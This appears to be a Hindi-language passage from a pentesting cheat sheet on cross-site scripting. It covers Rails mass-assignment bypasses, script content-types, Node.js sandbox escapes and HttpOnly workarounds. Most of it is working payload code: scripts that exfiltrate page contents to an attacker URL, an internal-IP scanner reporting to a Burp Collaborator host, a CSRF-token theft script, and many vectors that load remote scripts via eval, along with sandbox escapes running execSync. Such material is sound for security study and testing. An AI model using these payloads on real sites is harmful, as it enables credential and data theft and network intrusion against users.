"><svg/onload=confirm(1)>"@x.y
Ruby-On-Rails bypass
RoR मास असाइनमेंट के कारण HTML में उद्धरण डाले जाते हैं और फिर उद्धरण प्रतिबंध को बायपास किया जाता है और अतिरिक्त फ़ील्ड (onfocus) टैग के अंदर जोड़े जा सकते हैं।
फॉर्म उदाहरण (इस रिपोर्ट से), यदि आप पेलोड भेजते हैं:
यदि आप पाते हैं कि आप 302 Redirect response में headers inject कर सकते हैं तो आप ब्राउज़र को मनमाना JavaScript निष्पादित करने की कोशिश कर सकते हैं। यह सरल नहीं है क्योंकि आधुनिक ब्राउज़र HTTP response body को 302 HTTP response status code होने पर नहीं समझते, इसलिए केवल एक cross-site scripting payload बेकार है।
इस रिपोर्ट और इस रिपोर्ट में आप पढ़ सकते हैं कि आप Location header के अंदर कई प्रोटोकॉल का परीक्षण कैसे कर सकते हैं और देख सकते हैं कि क्या इनमें से कोई भी ब्राउज़र को XSS payload को body के अंदर निरीक्षण और निष्पादित करने की अनुमति देता है।
पिछले ज्ञात प्रोटोकॉल: mailto://, //x:1/, ws://, wss://, खाली Location header, resource://।
केवल अक्षर, संख्या और बिंदु
यदि आप यह संकेत देने में सक्षम हैं कि callback जो javascript निष्पादित करने जा रहा है, उन वर्णों तक सीमित है। इस पोस्ट के इस अनुभाग को पढ़ें यह जानने के लिए कि इस व्यवहार का दुरुपयोग कैसे किया जाए।
XSS के लिए मान्य <script> Content-Types
(से यहां) यदि आप एक content-type के साथ स्क्रिप्ट लोड करने की कोशिश करते हैं जैसे application/octet-stream, तो Chrome निम्नलिखित त्रुटि फेंकेगा:
Refused to execute script from ‘https://uploader.c.hc.lc/uploads/xxx' because its MIME type (‘application/octet-stream’) is not executable, and strict MIME type checking is enabled.
(From here) तो, कौन से प्रकार एक स्क्रिप्ट लोड करने के लिए संकेतित हो सकते हैं?
<scripttype="???"></script>
The answer is:
module (डिफ़ॉल्ट, समझाने के लिए कुछ नहीं)
webbundle: Web Bundles एक विशेषता है जिससे आप डेटा (HTML, CSS, JS…) को एक साथ .wbn फ़ाइल में पैकेज कर सकते हैं।
<scripttype="webbundle">{"source": "https://example.com/dir/subresources.wbn","resources": ["https://example.com/dir/a.js", "https://example.com/dir/b.js", "https://example.com/dir/c.png"]}</script>The resources are loaded from the source .wbn, not accessed via HTTP
importmap: आयात सिंटैक्स में सुधार करने की अनुमति देता है
<scripttype="importmap">{"imports": {"moment": "/node_modules/moment/src/moment.js","lodash": "/node_modules/lodash-es/lodash.js"}}</script><!-- With importmap you can do the following --><script>import moment from"moment";import { partition } from"lodash";</script>
यह व्यवहार इस लेख में एक पुस्तकालय को eval पर पुनः मैप करने के लिए उपयोग किया गया था ताकि इसका दुरुपयोग किया जा सके, यह XSS को ट्रिगर कर सकता है।
speculationrules: यह सुविधा मुख्य रूप से प्री-रेंडरिंग के कारण उत्पन्न कुछ समस्याओं को हल करने के लिए है। यह इस तरह काम करता है:
यदि पृष्ठ एक text/xml सामग्री प्रकार लौटाता है तो यह एक namespace निर्दिष्ट करना और मनमाना JS निष्पादित करना संभव है:
<xml><text>hello<imgsrc="1"onerror="alert(1)"xmlns="http://www.w3.org/1999/xhtml" /></text></xml><!-- Heyes, Gareth. JavaScript for hackers: Learn to think like a hacker (p. 113). Kindle Edition. -->
विशेष प्रतिस्थापन पैटर्न
जब कुछ इस तरह का "some {{template}} data".replace("{{template}}", <user_input>) उपयोग किया जाता है। हमलावर विशेष स्ट्रिंग प्रतिस्थापन का उपयोग करके कुछ सुरक्षा उपायों को बायपास करने की कोशिश कर सकता है: "123 {{template}} 456".replace("{{template}}", JSON.stringify({"name": "$'$`alert(1)//"}))
उदाहरण के लिए इस लेख में, इसका उपयोग एक स्क्रिप्ट के अंदर JSON स्ट्रिंग को स्केप करने और मनमाना कोड निष्पादित करने के लिए किया गया था।
यदि आपके पास उपयोग करने के लिए केवल सीमित सेट के अक्षर हैं, तो XSJail समस्याओं के लिए इन अन्य वैध समाधानों की जांच करें:
// eval + unescape + regexeval(unescape(/%2f%0athis%2econstructor%2econstructor(%22return(process%2emainModule%2erequire(%27fs%27)%2ereadFileSync(%27flag%2etxt%27,%27utf8%27))%22)%2f/))()
eval(unescape(1+/1,this%2evalueOf%2econstructor(%22process%2emainModule%2erequire(%27repl%27)%2estart()%22)()%2f/))// use of withwith(console)log(123)with(/console.log(1)/)with(this)with(constructor)constructor(source)()// Just replace console.log(1) to the real code, the code we want to run is://return String(process.mainModule.require('fs').readFileSync('flag.txt'))with(process)with(mainModule)with(require('fs'))return(String(readFileSync('flag.txt')))with(k='fs',n='flag.txt',process)with(mainModule)with(require(k))return(String(readFileSync(n)))with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))
//Final solutionwith(/with(String)with(f=fromCharCode,k=f(102,115),n=f(102,108,97,103,46,116,120,116),process)with(mainModule)with(require(k))return(String(readFileSync(n)))/)with(this)with(constructor)constructor(source)()// For more uses of with go to challenge misc/CaaSio PSE in// https://blog.huli.tw/2022/05/05/en/angstrom-ctf-2022-writeup-en/#misc/CaaSio%20PSE
यदि सब कुछ अपरिभाषित है अविश्वसनीय कोड निष्पादित करने से पहले (जैसे इस लेख में) तो "कुछ भी नहीं" से उपयोगी ऑब्जेक्ट्स उत्पन्न करना संभव है ताकि मनमाने अविश्वसनीय कोड के निष्पादन का दुरुपयोग किया जा सके:
import() का उपयोग करके
// although import "fs" doesn’t work, import('fs') does.import("fs").then(m=>console.log(m.readFileSync("/flag.txt","utf8")))
require को अप्रत्यक्ष रूप से एक्सेस करना
इसके अनुसार मॉड्यूल को Node.js द्वारा एक फ़ंक्शन के भीतर लपेटा जाता है, इस तरह:
इसलिए, यदि उस मॉड्यूल से हम दूसरी फ़ंक्शन को कॉल कर सकते हैं, तो उस फ़ंक्शन से require तक पहुँचने के लिए arguments.callee.caller.arguments[1] का उपयोग करना संभव है:
पिछले उदाहरण के समान, त्रुटि हैंडलर का उपयोग करके मॉड्यूल के wrapper तक पहुँच प्राप्त करना और require फ़ंक्शन प्राप्त करना संभव है:
try {
null.f()
} catch (e) {
TypeError = e.constructor
}
Object = {}.constructor
String = ''.constructor
Error = TypeError.prototype.__proto__.constructor
function CustomError() {
const oldStackTrace = Error.prepareStackTrace
try {
Error.prepareStackTrace = (err, structuredStackTrace) => structuredStackTrace
Error.captureStackTrace(this)
this.stack
} finally {
Error.prepareStackTrace = oldStackTrace
}
}
function trigger() {
const err = new CustomError()
console.log(err.stack[0])
for (const x of err.stack) {
// use x.getFunction() to get the upper function, which is the one that Node.js adds a wrapper to, and then use arugments to get the parameter
const fn = x.getFunction()
console.log(String(fn).slice(0, 200))
console.log(fn?.arguments)
console.log('='.repeat(40))
if ((args = fn?.arguments)?.length > 0) {
req = args[1]
console.log(req('child_process').execSync('id').toString())
}
}
}
trigger()
आप JavaScript से कुकीज़ तक पहुँच नहीं पाएंगे यदि कुकी में HTTPOnly ध्वज सेट किया गया है। लेकिन यहाँ आपके पास इस सुरक्षा को बायपास करने के कुछ तरीके हैं यदि आप भाग्यशाली हैं।
पृष्ठ सामग्री चुराना
var url = "http://10.10.10.25:8000/vac/a1fbf2d1-7c3f-48d2-b0c3-a205e54e09e8";
var attacker = "http://10.10.14.8/exfil";
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
fetch(attacker + "?" + encodeURI(btoa(xhr.responseText)))
}
}
xhr.open('GET', url, true);
xhr.send(null);
आंतरिक IP खोजें
<script>
var q = []
var collaboratorURL = 'http://5ntrut4mpce548i2yppn9jk1fsli97.burpcollaborator.net';
var wait = 2000
var n_threads = 51
// Prepare the fetchUrl functions to access all the possible
for(i=1;i<=255;i++){
q.push(
function(url){
return function(){
fetchUrl(url, wait);
}
}('http://192.168.0.'+i+':8080'));
}
// Launch n_threads threads that are going to be calling fetchUrl until there is no more functions in q
for(i=1; i<=n_threads; i++){
if(q.length) q.shift()();
}
function fetchUrl(url, wait){
console.log(url)
var controller = new AbortController(), signal = controller.signal;
fetch(url, {signal}).then(r=>r.text().then(text=>
{
location = collaboratorURL + '?ip='+url.replace(/^http:\/\//,'')+'&code='+encodeURIComponent(text)+'&'+Date.now()
}
))
.catch(e => {
if(!String(e).includes("The user aborted a request") && q.length) {
q.shift()();
}
});
setTimeout(x=>{
controller.abort();
if(q.length) {
q.shift()();
}
}, wait);
}
</script>
जब भी पासवर्ड फ़ील्ड में कोई डेटा डाला जाता है, उपयोगकर्ता नाम और पासवर्ड हमलावर के सर्वर पर भेजा जाता है, भले ही क्लाइंट एक सहेजा हुआ पासवर्ड चुनता है और कुछ नहीं लिखता है, क्रेडेंशियल्स को एक्स-फिल्ट्रेट किया जाएगा।
आप मेटास्प्लॉइट http_javascript_keylogger का भी उपयोग कर सकते हैं
CSRF टोकन चुराना
<script>
var req = new XMLHttpRequest();
req.onload = handleResponse;
req.open('get','/email',true);
req.send();
function handleResponse() {
var token = this.responseText.match(/name="csrf" value="(\w+)"/)[1];
var changeReq = new XMLHttpRequest();
changeReq.open('post', '/email/change-email', true);
changeReq.send('csrf='+token+'&email=test@test.com')
};
</script>
"><img src='//domain/xss'>
"><script src="//domain/xss.js"></script>
><a href="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">Click Me For An Awesome Time</a>
<script>function b(){eval(this.responseText)};a=new XMLHttpRequest();a.addEventListener("load", b);a.open("GET", "//0mnb1tlfl5x4u55yfb57dmwsajgd42.burpcollaborator.net/scriptb");a.send();</script>
<!-- html5sec - Self-executing focus event via autofocus: -->
"><input onfocus="eval('d=document; _ = d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')" autofocus>
<!-- html5sec - JavaScript execution via iframe and onload -->
"><iframe onload="eval('d=document; _=d.createElement(\'script\');_.src=\'\/\/domain/m\';d.body.appendChild(_)')">
<!-- html5sec - SVG tags allow code to be executed with onload without any other elements. -->
"><svg onload="javascript:eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')" xmlns="http://www.w3.org/2000/svg"></svg>
<!-- html5sec - allow error handlers in <SOURCE> tags if encapsulated by a <VIDEO> tag. The same works for <AUDIO> tags -->
"><video><source onerror="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- html5sec - eventhandler - element fires an "onpageshow" event without user interaction on all modern browsers. This can be abused to bypass blacklists as the event is not very well known. -->
"><body onpageshow="eval('d=document; _ = d.createElement(\'script\');_.src=\'//domain\';d.body.appendChild(_)')">
<!-- xsshunter.com - Sites that use JQuery -->
<script>$.getScript("//domain")</script>
<!-- xsshunter.com - When <script> is filtered -->
"><img src=x id=payload== onerror=eval(atob(this.id))>
<!-- xsshunter.com - Bypassing poorly designed systems with autofocus -->
"><input onfocus=eval(atob(this.id)) id=payload== autofocus>
<!-- noscript trick -->
<noscript><p title="</noscript><img src=x onerror=alert(1)>">
<!-- whitelisted CDNs in CSP -->
"><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.6.1/angular.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<!-- ... add more CDNs, you'll get WARNING: Tried to load angular more than once if multiple load. but that does not matter you'll get a HTTP interaction/exfiltration :-]... -->
<div ng-app ng-csp><textarea autofocus ng-focus="d=$event.view.document;d.location.hash.match('x1') ? '' : d.location='//localhost/mH/'"></textarea></div>
Regex - Access Hidden Content
इस लेख से यह सीखना संभव है कि भले ही कुछ मान JS से गायब हो जाएं, फिर भी उन्हें विभिन्न वस्तुओं में JS विशेषताओं में ढूंढना संभव है। उदाहरण के लिए, REGEX का एक इनपुट तब भी ढूंढना संभव है जब regex के इनपुट का मान हटा दिया गया हो:
// Do regex with flag
flag="CTF{FLAG}"
re=/./g
re.test(flag);
// Remove flag value, nobody will be able to get it, right?
flag=""
// Access previous regex input
console.log(RegExp.input)
console.log(RegExp.rightContext)
console.log(document.all["0"]["ownerDocument"]["defaultView"]["RegExp"]["rightContext"])
क्या आपको कैशिंग का उपयोग करने वाली साइट पर XSS मिला? इस पेलोड के साथ उसे SSRF में अपग्रेड करने की कोशिश करें:
<esi:include src="http://yoursite.com/capture" />
इसे कुकी प्रतिबंधों, XSS फ़िल्टरों और बहुत कुछ को बायपास करने के लिए उपयोग करें!
इस तकनीक के बारे में अधिक जानकारी यहाँ: XSLT.
गतिशील रूप से बनाए गए PDF में XSS
यदि एक वेब पृष्ठ उपयोगकर्ता द्वारा नियंत्रित इनपुट का उपयोग करके एक PDF बना रहा है, तो आप बॉट को धोखा देने की कोशिश कर सकते हैं जो PDF बना रहा है ताकि वह मनमाने JS कोड को निष्पादित करे।
तो, यदि PDF निर्माता बॉट कुछ प्रकार के HTMLटैग पाता है, तो यह उन्हें व्याख्या करेगा, और आप इस व्यवहार का दुरुपयोग करके सर्वर XSS का कारण बन सकते हैं।
AMP, मोबाइल उपकरणों पर वेब पृष्ठ प्रदर्शन को तेज करने के लिए, HTML टैग को JavaScript के साथ जोड़ता है ताकि गति और सुरक्षा पर जोर दिया जा सके। यह विभिन्न सुविधाओं के लिए कई घटकों का समर्थन करता है, जो AMP घटकों के माध्यम से उपलब्ध हैं।
AMP for Email प्रारूप विशेष AMP घटकों को ईमेल में विस्तारित करता है, जिससे प्राप्तकर्ता अपने ईमेल के भीतर सीधे सामग्री के साथ इंटरैक्ट कर सकते हैं।